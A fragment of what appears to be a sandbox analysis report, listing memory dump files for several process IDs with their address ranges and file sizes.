                                                                                                                                                                                                                        • memory/6552-1903-0x0000019731CE0000-0x0000019731CFC000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                        • memory/6552-1906-0x0000019731D20000-0x0000019731D2A000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                        • memory/6552-1905-0x0000019731D10000-0x0000019731D18000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                        • memory/6552-1904-0x0000019731D00000-0x0000019731D0A000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                        • memory/9880-21675-0x0000000000380000-0x0000000000845000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                        • memory/9880-21663-0x0000000000380000-0x0000000000845000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                        • memory/10040-21703-0x0000000070120000-0x000000007016C000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                        • memory/10040-21713-0x0000000006DF0000-0x0000000006E93000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          652KB

                                                                                                                                                                                                                        • memory/10040-21718-0x0000000007160000-0x0000000007174000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                        • memory/10040-21715-0x0000000007100000-0x0000000007111000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          68KB

                                                                                                                                                                                                                        • memory/10316-21700-0x0000000000AF0000-0x0000000000F9A000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.7MB

                                                                                                                                                                                                                        • memory/10316-21727-0x0000000000AF0000-0x0000000000F9A000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.7MB

                                                                                                                                                                                                                        • memory/10496-23024-0x0000000000400000-0x00000000008C1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.8MB